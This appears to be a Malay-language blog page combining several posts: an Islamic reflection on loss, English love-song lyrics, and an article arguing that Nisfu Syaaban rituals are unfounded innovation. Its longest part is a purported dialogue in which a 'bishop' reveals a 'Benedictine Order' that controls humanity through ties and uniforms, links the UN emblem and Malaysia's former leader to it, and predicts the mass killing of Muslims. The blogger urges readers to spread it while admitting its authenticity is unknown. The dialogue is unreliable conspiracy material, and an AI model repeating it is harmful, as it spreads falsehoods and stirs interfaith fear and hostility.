Pelbagai masalah kehidupan direka supaya pelbagai penyelesaian dapat direka , pelbagai penyelesaian direka supaya pelbagai ilmu direka .pelbagai ilmu direka supaya pelbagai pekerjaan direka ,pelbagai pekerjaan direka supaya pelbagai taraf kehidupan direka pelbagai taraf kehidupan direka supaya pelbagai jiwa direka , pelbagai jiwa direka supaya pelbagai maruah direka ,pelbagai maruah direka supaya pelbagai cara diri mereka dibeli ..maruah yg akan mengkafirkan semua orang Islam ..mereka yg kafir sudah semestinya kafir..

Aku; peh!!…teliti betul pekerjaan org-org pak cik,tapi kan bagaimana ‘maruah’ boleh mengkafirkan org-org Islam???.apa buktinya???bukanya kami tidak ada otak hendak menilai macam mana sesuatu keadaan itu untuk dinilai sebagai kafir…

Jiran ; BENEDICTINE ORDER telah berkuasa terhadap semua manusia di planet ini ,tiada siapa dapat melarikan diri ..malah manusia berebut-rebut memilikinya .Mereka amat menyangi maruh ini dengan apa cara sekalipun ,kami tidak perlu buat apa-apapun ..percayalah
Seperti ‘CANTUS’…kami beri pakaian yg indah kepada mereka ini ..mereka benar-benar sukakannya ..malah jika paus berkata ..pakaian ini adalah khidmat kamu kepada ku ..mereka akan menafikannya !!! bagaimana Muhammad dapat menyelamatkan mereka sedangkan Paus sendiri sudah mengatakan kebenaran ??

Aku; sedangkan paus sendiri mengakui cakap macam tu dan mereka tidak dilayan…apatah lagi Imam Mahdi!…dunia betul-betul mahu kiamat..apa pakaian yg mereka pakai sampai dahsyat macam ini jadinya???

Jiran;….MEREKA ADALAH ORG2 YANG MEMAKAI.. “TIE” .itulah simbol “BENEDICTINE ORDER”..bukan itu sahaja ..apa saja pekerjaan manusia yg didatangkan pakaiannya adalah ” ADALAH BENEDICTINE ORDER!! mereka orang yg kamu kata golongan PROFESIONAL”,” kolar putih ,kolar biru ,pakaian formal dan pakaian seragam ..semuanya berkhidmat untuk BENEDICTINE ORDER. Lihat sahaja pakaian pelajar sekolah ,doktor ,ahli perniagaan ..mereka semuanya sama .walaupun pakaian mereka berbeza ..fungsi mereka adalah sama. mereka semua tidak menyedari telah dikuasai oleh gereja dan telah menjayakan BENEDICTINE ORDER.

Aku; pelik bin ajaib!!!….apa yg telah berlaku sehingga berbilion-bilion org telah bekhidmat untuk paus??!!!

Jiran ; Dulu dari kampung kamu Malaysia ada pemimpin kamu yg memerintah selama 20 tahun diundang menemui PAUS JOHN PAUL II, dan pemimpin kamu ditanya tentang pencapaian BENEDICTINE ORDER di sana .PAUS JOHN PAUL II sangat gembira dengan pemimpin kamu yg sukakan org-org Jepun ”DASAR PANDANG KE TIMUR”…dia selalu mengulang-ulang ayat ini kepada Paus .
Sebab itulah mengapa org -org Islam sengaja dicabar ..mundur itu mundur ini , maju itu maju ini ilmu iu ilmu ini ..orng -orng kafir sengaja dimajukan supaya org -orng Islam merasa tersepit dan membuatkan mereka merasakan “BENEDICTINE ORDER” suatu keperluan hidup org -org Islam tidak menyedari bahawa mereka bersaing umtuk BENEDICTINE ORDER..
Saya seorang BISHOP harus tahu kata-kata orang Islam yg terkenal seperti “BERJAYA DI DUNIA DAN AKHIRAT”,”MENJADI SEORG ISLAM YG CEMERLANG”…semua dirancang supaya ia menyakinkan kamu tanpa kami suruh anda berkata seperti itu …

Aku; jadi…benedictine order ni sudah berjaya ke belum???….kalau ia sudah berjaya kenapa org Islam sekarang ni masih mampu mengucap syahadah???

Jiran ; Sebenarnya ia telah dirancang 1000 tahun dahulu .semasa zaman seorang paderi yg bernama ST.MALACHY…VATICAN telah merancng bahawa PAUS YANG KE-111 akan memikul suatu pekerjaan .Maka kardinal KARDINAL JOSEPH RATZINGER semasa ditabalkan sebagai PAUS YANG KE-111,dia diberi nama “PAUS BENDICT XVI”
..PAUS terakhir menggunakan nama “BENEDICT”….Dia paus yg akan meraikan kejayaan “BENEDICTINE ORDER” …kejayaan ini dinamakan sebagai “GLORY OF THE OLIVE”
…Ya….SIMBOL BENEDICTINE….
Apa yg Islam sedang perjuangkan ?? .. bodoh benar org-org Islam ..sungguh menakjubkan !!! pengikut Muhammad sebodoh ini !!!…..

Aku; kalau macam ni la keadaanya…org-org kafir lg bodoh sebab diorg lagi maju…tapi pasti ada org-org Islam yg akan lawan Benedictine order..

Jiran ;Mahukan kamu tahu mengapa MUHAMAD yg baru akan kelihatan seperti penjenayah seperti yg saya katakan sebelum ini ?..Sebab dia menentang MENENTANG BENEDICTINE ORDER!!!
Ya ,setelah umat Islam sendiri mengakui bahawa pekerjaan mereka membawa keselesaan hidup dan berkata ilmu-ilmu ini dari cendiakawan Islam dahulu lihatlah kawan-kawan ku inilah nikmat Islam ”
Sebab itulah umat Islam diumpan supaya mereka mempertahankan ilmu -ilmu ini bahwa ia lahir dari sarjana -sarjana Islam ….padahal kami telah mengubah suai ilmu ini sebelum penjajah mengajarkan kepada kamu .
Apabila PAUS ROMAN PETER II muncul nanti umat Islam akan dituduh oleh org-org kafir bahawa ilmu-ilmu kepunyaan Islam lah yg membawa kerosakkan kepada mereka ..org -org Islam akan dibunuh habis-habisan oleh orang kafir ..gereja tidak perlu buat apa-apa…
Adakah orang -orang Islam yg dikatakan “UMAT ISLAM CEMERLANG” akan meninggalkan semua “KECEMERLANGAN” mereka ketika MUHAMAD datang mencabut kecemerlangan palsu mereka …SAYA FIKIR TIDAK!!!MEREKA AKAN MEMPERTAHANKAN “BENEDICTINE ORDER”….
Saya izinkan untuk kamu ceritakan perkara ini kepada org-org Islam ..kamu akan lihat mereka berkata kepada kamu ..Kamu dan cerita kamu semuanya tipu belaka !”

Aku ;sape yg akan kata macam tu kepada saya???…

Jiran ; MEREKA SEMUANYA….!!!!

PERBUALAN TAMAT
————————————————-
(cantus dan Benedictine…macam adik beradik,mereka tidak boleh dipisahkan,apapasal dia kata tidak boleh dipisahkan eh..lupa pulak aku nak tanya dia)

(seingat aku satu- nya pemimpin kita yg pernah jumpa Paus John Paul ii adalah Mahathir….ya..sebelum dia letak jawatan,dasar pandang ke timur,20 tahun perintah…)

(sanggup ke kalau para pembaca bakar sijil,diploma and ijazah kehormat anda ???..benedictine order semua tu….)

(Tidak ada beza pun kalau anda tidak pakai tali leher,seluar sleek dan kemeja…kerja tetap sama,…tidak buat kerja tak dapat gaji,macam nak bagi anak bini makan?…perangkap maut!!!)
—————————————

Komen Efery
Bahagian ini juga amat menarik. Sekali lagi Bishop tersebut menyebutkan tentang Pope Roman Peter II yang akan muncul selepas 111th Pope iaitu Pope Benedict sekarang dan tentang Benedictine Order.
Apabila PAUS ROMAN PETER II muncul nanti ,umat Islam akan dituduh oleh org-org kafir bahawa ilmu -ilmu kepunyaan Islamlah yg menyebabkan kerosakkan kepada diri mereka ..orang -orang Islam akan dibunuh habis-habisan oleh org kafir ..gereja tidak perlu buat apa-apa pun …

Jiran; “BENEDICTINE ORDER IS SYMBOLIZE BY THE OLIVE WHEAT AND GRAIN”…dan kamu lihat UN menggunakan simbol BENEDICTINE ….dan para paus telah membina perjuangan yg akan diselesaikan oleh paus yg akan datang …..
Lambang UN itu sendiri adalah Olive Wheat And Grain. Adakah Bishop ini sengaja mereka cerita tentang UN ini? Oh, tidak. UN adalah antara pelan mereka untuk mewujudkan One World Government tidak lama lagi.

Jiran ; Dulu dari kampung kamu ,malaysia ada pemimpin yg berkuasa selama 20 tahun diundang menemui PAUS JOHN PAUL II,dan pemimpin kamu ditanya tentang pencapaian BENEDICTINE ORDER di sana
PAUS JOHN PAUL II sangat gembira dengan pemimpin kamu yg sukakan org-org jepun …”DASAR PANDANG KE TIMUR”…dia selalu mengulang-ulang ayat ini kepada paus
Ramai orang menuntut ilmu kerana pangkat dan kedudukan. Ini adalah salah satu tanda kiamat. Keadaan ini bertepatan dengan situasi sekarang, orang
menuntut ilmu kerana mahu mengejar pangkat, kedudukan harta! Bertepatan dengan kata-kata Bishop tersebut di bawah.

Jiran ; BENEDICTINE ORDER telah berkuasa terhadap semua manusia diplanet ini ,tiada siapa yg dapat melarikan diri ..malah manusia berebut -rebut memilikinya .
Mereka sangat menyukai diri sendiri ,malah mereka akan mempertahankan dengan apa cara sekalipun ,kami tidak perlu lakukan apa-apa ..percayalah
Seperti ‘CANTUS’…kami juga memberikan pakaian yg indah kepada mereka ini ..mereka benat-benar sukakannya ..
Bishop itu juga tidak kisah rahsia sebegini disebarkan kerana dia tahu ramai antara kita tidak percaya dengan semua ini. Ada beberapa faktor yang menyebabkan mereka tidak percaya, antaranya ialah minda mereka terlalu lama terpenjara oleh Dajal.
Saya izinkan untuk kamu cerita perkara ini keopada orang-orang Islam ..kamu akan lihat mereka berkata kepada kamu ..kamu dan cerita kamu semuanya tipu belaka !!!!!
———————
saya pun tidak tahu setakat mana kesahihannya dialog ini … apa yg penting pengajaran yg terdapat dr dialog ini … rancangan mereka sudah 97 % berhasil ….. apa yg belum disiapkan menurut pendapat saya ialah .. rancangan untuk menjadikan manusia ini di bawah satu dunia ,satu nilai mata wang .satu pasukan tentera .dan yg paling mengerikan ialah satu tuhan yg bermata satu !!! ………wallahu a’lam .

p/s —–>>> Sama2 kita sebarkan dialog ni…kalau ada yg xmau percaya,trpulang,tp kita harus ambil iktibar…fikirkan balik apa yg dunia kita lalui skrg…
Wassalam…
Jazakumullahu khairan kathiiraa..

Jangan Ditangisi Apa yang Bukan Milikmu


Assalamu’alaikum…selamat pagi semua…semoga di pg 15 sya’aban ni,kita diampuni dosa2 oleh Allah…pg ni,terdetik kt hati aku nk bce artikel kt iluvislam.com..dan aku terjumpe artikel di bawah ni…ak sharekan blk untuk santapan minda kita bersama…insyaallah,mudah-mudahan,Allah akan memberkati setiap amalan kita…

Dalam perjalanan hidup ini seringkali kita merasa kecewa. Kecewa sekali. Sesuatu yang luput dari genggaman, keinginan yang tidak tercapai dan kenyataan yang tidak sesuai dengan harapan.

Dan sungguh sangat beruntung andai dalam saat-saat tergoncangnya jiwa, masih ada setitik cahaya dalam kalbu untuk merenungi kebenaran. Masih ada kekuatan untuk melangkahkan kaki menuju majlis-majlis ilmu dan majlis-majlis zikir yang akan memberikan ketenteraman jiwa.

Hidup ini ibarat belantara. Tempat kita mengejar pelbagai keinginan dan impian. Dan memang manusia diciptakan mempunyai kehendak serta mempunyai keinginan. Tetapi bukan semua yang kita inginkan dapat dicapai. Sesungguhnya tidak mudah menyedari bahawa apa yang bukan menjadi hak kita tak perlu kita tangisi. Banyak orang yang tidak sedar bahawa hidup ini tidak punya satu hukum: harus berjaya, harus bahagia atau harus-harus yang lain.

Betapa banyak orang yang berjaya tetapi lupa bahawa hakikatnya semua itu pemberian Allah sehingga membuatnya sombong dan bertindak sewenang-wenangnya. Begitu juga kegagalan sering tidak dihadapi dengan betul. Padahal dimensi tauhid dari kegagalan adalah tidak tercapainya apa yang memang bukan hak kita. Padahal hakikat kegagalan adalah tidak terengkuhnya apa yang memang bukan hak kita.

Apa yang memang menjadi milik kita di dunia, samada rezeki, jawatan atau kedudukan, pasti Allah akan berikan. Tetapi apa yang memang bukan milik kita, kita tidak akan mampu miliki; walaupun ia nyaris menghampiri kita atau meskipun kita bermati-matian berusaha mendapatkannya.

“Tiada suatu bencana pun yang menimpa di bumi dan (tidak pula) pada dirimu sendiri melainkan telah tertulis dalam kitab (Luh Mahfuzh) sebelum Kami menciptakannya. Sesungguhnya yang demikian itu adalah mudah bagi Allah. (Kami jelaskan yang demikian itu) supaya kamu jangan berdukacita terhadap apa yang luput dari kamu, dan supaya kamu jangan terlalu gembira terhadap apa yang diberikan-Nya kepadamu. Dan Allah tidak menyukai setiap orang yang sombong lagi membanggakan diri..” (Surah Al-Hadid: 22-23)

Maka sudahlah, jangan kau tangisi apa yang bukan milikmu!

Wassalam…

Jazakumullahu Khairan Kathiiraa..

i said i love u…


Girl,come to me
I will chase your tears away
Put your trust in me
Girl I swear I’ll never change
Darling you will see
That my love is here to stay
I promise you, I will be true
From here and now, forever girl I

I said I love you
I said I care
When I tell you I love you
It mean I always will be there
I’ll never leave you
I ain’t goin’ nowhere
When I tell you I love you
Cross my heart I will be there

Open up your heart
Don’t be afraid to love again
We can take it slow
You should know I understand
Take your time
And I don’t care how long it takes
‘Cause I promise you, I’m here for you
From here and now, forever…

And I will be there for you
Forever sincere to you
Girl I’ll always care for you
I just wanna share my life with you
Right here, right now, and forever

Nisfu Syaaban dan fatwa tentangnya


14 Syaaban 1431H.
http://almizan.wordpress.com/

Sebagaimana telah kita ketahui apabila tibanya malam 15 Sya’aban, ramai yang akan ke masjid untuk solat jemaah dan membaca yasin sebanyak 3 kali. Tetapi tahukah kita dari mana amalan itu berasal? Sedangkan kita tahu, bahawa sesuatu ibadah khusus yang dilakukan jika tiada amalan atau dalil dari nabi Muhammad S.a.w maka dikira bid’ah.

Persoalannya mengapa perlu dilakukan sebanyak 3 kali dan dikhususkan pada malam tersebut? Sedangkan bacaan Yasin boleh dilakukan pada bila-bila masa dan tidak terhad kepada berapa kali.

Seperti yang selalu saya lihat, bacaan Yasin yang dibuat sebanyak 3 kali itu dilakukan dengan pantas dan terkejar-kejar. Mungkin ianya sesuai dengan orang yang sudah mahir membaca Qasar, tetapi bagaimana dengan mereka yang tidak mahir dengan bacaan Qasar lebih-lebih lagi bagi yang tidak mahir membaca AlQuran bertajwid. Tidakkah itu sudah menjadi tunggang-langgang dan tidak berlaku dalam keadaan yang tenang. Apakah bagus membaca AlQuran dalam keadaan tergesa-gesa dan salah tajwidnya? Apakah hikmah di sebalik tergesa-gesa dan tidak faham apa yang dibaca itu?

Sebenarnya tiada hadith yang sahih yang memberitahu tentang bacaan yasin 3 kali pada malam nisfu Syaaban ini dan jika ada pun, ianya adalah hadith berkenaan kelebihan malam nisfu Syaaban yang dhaif dan juga terdapat dalam hadith maudhu’ (palsu). Walau bagaimanapun ada sebahagian ulama berpendapat hadis dhaif boleh dipegang dalam amalan sunat secara perseorangan. Tetapi tidak sekali-kali dengan hadith maudhu’. Ingat, hadith maudhu’ maknanya hadith PALSU, dan hadith PALSU hanyalah hadith yang direka-reka oleh golongan tertentu. Dengan kerana itu, adalah penting agar kita berhati-hati dalam memahami martabat sesuatu hadith itu.

Namun , dalam soal bacaan Yasin sebanyak 3 kali dalam nisfu Syaaban tetap tidak ada hadith yang sahih berkenaannya dan amalan tersebut tiada ditunjukkan contoh langsung oleh nabi dan sahabat. Maka mengapa kita sekarang ini mengadakan majlis tersebut di masjid-masjid apabila tibanya malam nisfu Syaaban sahaja? Mengapa perlu menetapkan malam itu untuk membaca Yasin 3 kali dan berduyun-duyun menuju ke masjid sedangkan malam lain tidak? Itu yang perlu diperhati bersama.

Dan saya tidak berani mengatakan amalan tersebut haram. tetapi kita perlu ingat, amalan ibadah khusus yang bukannya berasal dari nabi sudah dikira bid’ah dan dibimbangi amalan itu akan menjadi penat dan lelah semata-mata kerana tidak berasas atau menambah dosa sahaja. Tetapi menurut fatwa dari Syeikh Abdul Aziz bin Baaz, amalan itu dikira bid’ah dan penjelasannya ada saya sertakan di bawah nanti.

Maka sebaiknya adalah kita lakukan sahaja amalan membaca Yasin atau apa-apa sahaja bacaan AlQuran , tanpa perlu dikhususkan 3 kali dan seumpamanya. Dan yang penting, bacaan itu biarlah TERTIB, TENANG dan memberi keinsafan kepada kita dan bukannya semata-mata mahu mengejar pahala sehingga membaca AlQuran dengan tergopoh dan salah tajwid dan mengatakan sepatutnya melakukan bacaan Yasin 3 kali itu.

Pengertian nisfu Syaaban

Nisfu dalam bahasa arab bererti setengah. Nisfu Syaaban bererti setengah bulan Syaaban. Malam Nisfu Syaaban adalah malam lima-belas Syaaban iaitu siangnya empat-belas haribulan Syaaban.

Malam Nisfu Syaaban merupakan malam yang penuh berkat dan rahmat selepas malam Lailatul qadr. Saiyidatina Aisyah r.a. meriwayatkan bahawa Nabi saw tidak tidur pada malam itu sebagaimana yg tersebut dalam sebuah hadis yg diriwayatkan oleh Imam Al-Baihaqi r.a:

Rasulullah saw telah bangun pada malam (Nisfu Syaaban) dan bersembahyang dan sungguh lama sujudnya sehingga aku fikir beliau telah wafat. Apabila aku melihat demikian aku mencuit ibu jari kaki Baginda saw dan bergerak. Kemudian aku kembali dan aku dengar Baginda saw berkata dlm sujudnya, “Ya Allah aku pohonkan kemaafanMu daripada apa yg akan diturunkan dan aku pohonkan keredhaanMu daripada kemurkaanMu dan aku berlindung kpdMu daripadaMu. Aku tidak dpt menghitung pujian terhadapMu seperti kamu memuji diriMu sendiri.”

Setelah Baginda saw selesai sembahyang, Baginda berkata kpd Saiyidatina Aisyah r.a. “Malam ini adalan malam Nisfu syaaban. Sesungguhnya Allah Azzawajjala telah dtg kpd hambanya pada malam Nisfu syaaban dan memberi keampunan kpd mereka yg beristighfar, memberi rahmat ke atas mereka yg memberi rahmat dan melambatkan rahmat dan keampunan terhadap orang2 yg dengki.”

Hari nisfu sya’aban adalah hari dimana buku catatan amalan kita selama setahun diangkat ke langit dan diganti dengan buku catatan yang baru. Catatan pertama yang akan dicatatkan dibuku yang baru akan bermula sebaik sahaja masuk waktu maghrib, (15 Sya’aban bermula pada 14 hb sya’aban sebaik sahaja masuk maghrib)

Fatwa tentang merayakan malam Nisfu Syaaban

Bacaan yasin

Umat Islam di Malaysia umumnya menyambut malam nisfu Syaaban ( 15hb Syaaban) dengan mengadakan majlis membaca surah Yasin sebanyak tiga kali selepas solat Maghrib. Di celah-celah bacaan Yasin ini diselitkan dengan bacaan doa seperti , selepas bacaan Yasin pertama dengan doa untuk diselamatkan dunia akhirat, selepas bacaan Yasin kedua doa supaya dipanjangkan umur dalam keberkatan dan selepas bacaan Yasin ketiga doa supaya dianugerahkan rezeki yang halal.

Diperhatikan bahawa amalan sambutan Nisfu Syaaban yang kaifiatnya sebegini tidak diamalkan di tempat lain di seluruh dunia. Tidak hairanlah tiada fatwa yang dikeluarkan oleh Ulama muktabar dunia masa kini tentang sahih batilnya amalan ini.

Kita beramal dan beribadat adalah untuk mendapat pahala dan kebaikan . Amalan ini hendaklah ada contohnya dari Rasulullah s.a.w. atau sahabat-sahabat atau ada petunjuk yang jelas dari al-Quran dan as-sunnah . Amalan mengkhususkan bacaan dan doa tertentu pada sesuatu masa tanpa nas yang sahih adalah amalan bidaah yang tertolak dan dikhuatiri berdosa; setidak-tidaknya ia akan membazirkan masa dan memenatkan badan.

Kita boleh membaca surah Yasin sebanyak mungkin pada bila-bila masa untuk mendapat pahala tetapi tidak dengan mengkhususkan kepada malam nisfu Syabaan dan dengan bilangan tiga kali. Kita digalakkan berdoa apa saja kepada Allah s.w.t untuk kebaikan dunia dan di akhirat tetapi tidak perlu dikhususkan di celah-celah bacaan Yasin di malam nisfu Syaaban. Dan kita boleh membaca surah Yasin dan berdoa bersendirian, di mana-mana dan bila-bila saja dan tidak perlu berkampung di masjid-masjid dengan harapan mendapat ganjaran istimewa dari Allah s.w.t.

Berikut adalah fatwa yang dikeluarkan oleh seorang ulama terkemuka di Timur Tengah untuk menjelaskan tentang amalan bidaah di malam nisfu Syaaban. Perhatikan bahawa beliau tidak menyebut amalan membaca Yasin dan doa-doa yang mengiringinya kerana amalan tersebut tidak diamalkan oleh penduduk di Timur Tengah atau di bahagian lain dunia Islam. Boleh dikatakan bahawa amalan baca Yasin dan doa ini adalah sebahagian dari sekian banyak amalan bidaah ciptaan rakyat tempatan khusus untuk amalan penduduk nusantara ini!

‘Solat Sunat’ Nisfu Syaaban

Firman Allah (mafhumnya): “Pada hari ini, Aku telah sempurnakan bagi kamu agama kamu dan Aku telah cukupkan nikmatKu kepada kamu dan Aku telah redakan Islam itu menjadi agama untuk kamu.” [al-Maa’idah 5:3]. “Patutkah mereka mempunyai sekutu-sekutu yang menentukan mana-mana bahagian dari agama mereka sebarang undang-undang yang tidak diizinkan oleh Allah?” [al-Syur.a 42:21]

Dalam kitab al-Sahihain diriwayatkan daripada `Aisyah (r.a) bahawa Rasulullah (s.a.w) pernah bersabda: “barangsiapa mengada-adakan perkara baru dalam urusan (agama) kita ini yang mana bukan sebahagian daripadanya, akan tertolak.”

Dalam Sahih Muslim diriwayatkan daripada Jabir r.a, Nabi (s.a.w) bersabda dalam khutbah Baginda: “Tetaplah kamu dengan Sunnahku dan Sunnah para Khulafa’ Rasyidun, serta berpegang teguhlah padanya… Berwaspadalah terhadap perkara yang baru diada-adakan, kerana setiap perkara baru adalah bid’ah dan setiap perkara bid’ah itu adalah sesat.” Terdapat banyak lagi ayat Qur’an dan hadis yang seumpamanya.

Ini jelas sekali menunjukkan bahawa Allah telah sempurnakan agama umat ini, dan mencukupkan nikmatNya ke atas mereka. Tuhan tidak mengambil nyawa RasulNya sehinggalah Baginda selesai menyampaikan perutusan dengan seterang-terangnya dan menghuraikan kepada ummah segala apa yang telah diperintahkan Allah samada amalan perbuatan mahupun percakapan. Baginda s.a.w telah menerangkan bahawa untuk ibadah yang direka selepas kewafatan Baginda, segala bacaan dan amalan yang kononnya dilakukan menurut Islam, kesemua ini akan dicampakkan kembali kepada orang yang mencipta amalan tersebut, meskipun ia berniat baik.

Para Sahabat Nabi s.a.w tahu tentang hakikat ini, begitu juga para salaf selepas mereka. Mereka mengecam bid’ah dan menegahnya, sebagaimana telah dicatatkan dalam kitab-kitab yang menyanjung Sunnah dan mengecam bid’ah, ditulis oleh bin Waddah, al-Tartushi, bin Shamah dan lain-lain.

Antara amalan bid’ah yang direka manusia ialah menyambut hari pertengahan dalam bulan Syaaban (Nisfu Syaaban), dan menganjurkan puasa pada hari tersebut. Tidak ada nas (dalil) yang boleh dipercayai tentang puasa ini. Ada beberapa hadis dhaif telah dirujuk tentang fadhilat puasa ini, tetapi ianya tidak boleh dijadikan pegangan. Hadis-hadis diriwayatkan mengenai fadhilat doa sempena nisfu Syaaban kesemuanya adalah maudhu’ (rekaan semata-mata), sebagaimana telah diperjelaskan oleh sebahagian besar alim ulama. Kita akan lihat beberapa petikan dari ulasan para alim ulama ini.

Beberapa riwayat tentang hal ini telah dinukilkan daripada sebahagian ulama salaf di Syria dan lain-lain. Menurut jumhur ulama, menyambut nisfu Syaaban adalah bid’ah, dan hadis-hadis tentang fadhilat-fadhilat berkenaan hari tersebut adalah dhaif (lemah), sebahagian besar yang lain pula adalah maudhu’ (rekaan). Antara ulama yang memperjelaskan hal ini adalah al-Haafiz bin Rejab, di dalam kitabnya Lataa’if al-Ma’aarif, dan lain-lain. Hadis-hadis dha`if berkenaan ibadah hanya boleh diterimapakai untuk amalan ibadat yang terdapat menerusi nas-nas yang Sahih. Tidak ada asas yang Sahih bagi sambutan nisfu Syaaban, oleh itu hadis-hadis dha`if tersebut tidak dapat digunapakai.

Prinsip asas yang penting ini telah disebutkan oleh Imam Abu’l-‘Abbas Sheikh al-Islam bin Taymiyah (rahimahullah). Para alim ulama (rahimahumullah) telah sepakat bahawa apabila wujud perselisihan di kalangan umat, maka wajiblah merujuk kepada Kitab Allah dan Sunnah Rasulullah s.a.w. Apa-apa keputusan yang diperolehi daripada salah satu atau kedua-duanya adalah syariat yang wajib ditaati, sebaliknya apa-apa yang didapati bercanggah dengan kedua-duanya mestilah ditolak. Oleh itu sebarang amalan ibadat yang tidak dinyatakan di dalam kedua-dua (Qur’an dan Sunnah) adalah bid’ah dan tidak dibenarkan melakukannya, apatah lagi mengajak orang lain melakukannya atau mengiktirafkannya.

Sebagaimana Firman Allah (mafhumnya): “Wahai orang-orang yang beriman, taatlah kamu kepada Allah dan taatlah kamu kepada Rasulullah dan kepada “Ulil-Amri” (orang-orang yang berkuasa) dari kalangan kamu. Kemudian jika kamu berbantah-bantah (berselisihan) dalam sesuatu perkara, maka hendaklah kamu mengembalikannya kepada (Kitab) Allah (Al-Quran) dan (Sunnah) RasulNya jika kamu benar beriman kepada Allah dan hari akhirat. Yang demikian adalah lebih baik (bagi kamu) dan lebih elok pula kesudahannya.” [al-Nisa’ 4:59]

“Dan (katakanlah wahai Muhammad kepada pengikut-pengikutmu): Apa jua perkara agama yang kamu berselisihan padanya maka hukum pemutusnya terserah kepada Allah; Hakim yang demikian kekuasaanNya ialah Allah Tuhanku; kepadaNyalah aku berserah diri dan kepadaNyalah aku rujuk kembali (dalam segala keadaan).”[al-Shura 42:10]. “Katakanlah (wahai Muhammad): Jika benar kamu mengasihi Allah maka ikutilah daku, nescaya Allah mengasihi kamu serta mengampunkan dosa-dosa kamu dan (ingatlah), Allah Maha Pengampun, lagi Maha Mengasihani.” [Aal ‘Imr.an 3:31]

“Maka demi Tuhanmu (wahai Muhammad)! Mereka tidak disifatkan beriman sehingga mereka menjadikan engkau hakim dalam mana-mana perselisihan yang timbul di antara mereka, kemudian mereka pula tidak merasa di hati mereka sesuatu keberatan dari apa yang telah engkau hukumkan dan mereka menerima keputusan itu dengan sepenuhnya.” [al-Nisa’ 4:65]

Banyak lagi ayat-ayat lain yang serupa maksudnya seperti di atas, yang menyatakan dengan jelas bahawa sebarang perselisihan wajib dirujuk kepada Qur’an dan Sunnah, seterusnya wajib mentaati keputusan yang diperolehi daripada kedua-dua Nas ini. Ini merupakan syarat iman, dan inilah yang terbaik untuk manusia di dunia dan di akhirat: “Yang demikian adalah lebih baik (bagi kamu) dan lebih elok pula kesudahannya” [al-Nisa’ 4:59 – mafhumnya] maksudnya ialah Hari Akhirat.

Al-Hafiz bin Rejab (R.A) menyebut di dalam kitabnya Lataa’if al-Ma’aarif tentang isu ini – setelah membincangkannya secara panjang lebar – “Malam Nisfu Syaaban asalnya diutamakan oleh golongan Tabi’in di kalangan penduduk Sham, antaranya Khalid bin Mi’dan, Makhul, Luqman bin ‘Amir dan lain-lain, di mana mereka beribadah bersungguh-sungguh pada malam tersebut. Orang awam menganggap bahawa malam tersebut adalah mulia kerana perbuatan mereka ini. Disebutkan bahawa mereka telah mendengar riwayat-riwayat Israiliyyat berkenaan kelebihan malam tersebut, sedangkan jumhur ulama di Hijaz menolak kesahihan riwayat ini, antara mereka adalah ‘Ata’ dan Ibnu Abi Malikah. ‘Abdul Rahman bin Zaid bin Aslam meriwayatkan fatwa ini daripada fuqaha’ (Ulama Ahli Fiqh) di Madinah, dan inilah pandangan ulama-ulama Maliki dan lain-lain. Kata mereka: semua ini adalah bid’ah…

Imam Ahmad tidak pernah diketahui menyebut apa-apa pun tentang (adanya sambutan) Malam Nisfu Syaaban… Tentang amalan berdoa sepanjang Malam Nisfu Syaaban, tidak ada riwayat yang sahih daripada Nabi (s.a.w) ataupun daripada Para Sahabat Baginda …”

Inilah apa yang telah disebutkan oleh al-Hafiz bin Rejab (R.A). Beliau menyatakan dengan jelas bahawa tidak ada langsung riwayat sahih daripada Rasulullah s.a.w mahupun daripada Sahabat-sahabat Baginda (R.A) mengenai Malam Nisfu Shaaban (pertengahan bulan Syaaban).

Dalam keadaan di mana tidak ada bukti shar’i bahawa apa-apa perkara itu disuruh oleh Islam, tidak dibenarkan bagi Umat Islam untuk mereka-reka perkara baru dalam agama Allah, tidak kiralah ianya amalan perseorangan ataupun berkumpulan, samada dilakukan secara terbuka mahupun tertutup, berdasarkan maksud umum hadith Rasulullah s.a.w: “Barangsiapa melakukan apa sahaja amalan yang bukan sebahagian daripada urusan kita ini [Islam], amalan itu akan tertolak.” Banyak lagi dalil yang menegaskan bahawa bid’ah mesti ditegah dan memerintahkan agar menjauhinya.

Imam Abu Bakr al-Tartushi (R.A) menyebut dalam kitabnya al-Hawadith wa’l-Bida’: “Ibn Waddah meriwayatkan bahawa Zayd bin Aslam berkata: Kami tidak pernah menemui seorang pun dari kalangan ulama dan and fuqaha’ kami yang memberi perhatian lebih kepada Malam Nisfu Shaaban, tidak ada juga yang memberi perhatian kepada hadith Makhul, atau yang beranggapan bahawa malam tersebut adalah lebih istimewa daripada malam-malam lain. Pernah ada orang mengadu kepada Ibnu Abi Maleekah bahawa Ziyad an-Numairi mengatakan bahawa pahala di Malam Nisfu Shaaban adalah menyamai pahala Lailatul-Qadar. Beliau menjawab, “Sekiranya aku dengar sendiri dia berkata begitu dan ada kayu di tanganku, pasti aku akan memukulnya (dengan kayu itu). Ziyad seorang pereka cerita.”

Al-Shaukani (R.A) berkata dalam al-Fawa’id al-Majmu’ah: “Hadith yang berbunyi: ‘Wahai ‘Ali, barangsiapa bersolat seratus rakaat di Malam Nisfu Shaaban, dengan membaca pada setiap rakaat Ummul Kitab [Surah al-Fatihah] dan Qul Huwallahu Ahad sepuluh kali, Allah akan memenuhi segala keperluannya…’ Hadis ini maudhu’ (rekaan semata-mata). Susunan katanya menyebut dengan jelas ganjaran yang akan diterima oleh orang yang melakukannya, dan tidak ada orang yang waras yang boleh meragui bahawa ‘hadis’ ini adalah rekaan. Lebih-lebih lagi, perawi dalam isnad hadis ini adalah majhul (tidak dikenali). ‘Hadis’ ini juga diriwayatkan melalui sanad yang lain, yang mana kesemua adalah direka dan kesemua perawinya adalah are majhul (tidak diketahui asal-usulnya).

Di dalam kitab al-Mukhtasar, beliau menukilkan: Hadith yang menyebut tentang solat di tengah bulan Syaaban adalah hadis palsu, dan hadis Ali yang diriwayatkan oleh Ibnu Hibban – “ Apabila tiba malam pertengahan Syaaban, penuhilah malamnya dengan solat dan berpuasalah di siang harinya” – adalah dhaif (lemah).

Di dalam kitab al-La’aali’ beliau berkata, “Seratus rakaat di pertengahan Syaaban, membaca (Surah) al-Ikhlas sepuluh kali di setiap rakaat… (hadis ini) adalah maudhu’ (direka), dan kesemua perawi dalam tiga isnadnya adalah majhul (tidak dikenali) dan dhaif (lemah). Katanya lagi: dan dua belas rakaat, membaca al-Ikhlaas tiga puluh kali setiap rakaat, ini juga adalah maudhu’; dan empat belas (rakaat), juga adalah maudhu’.

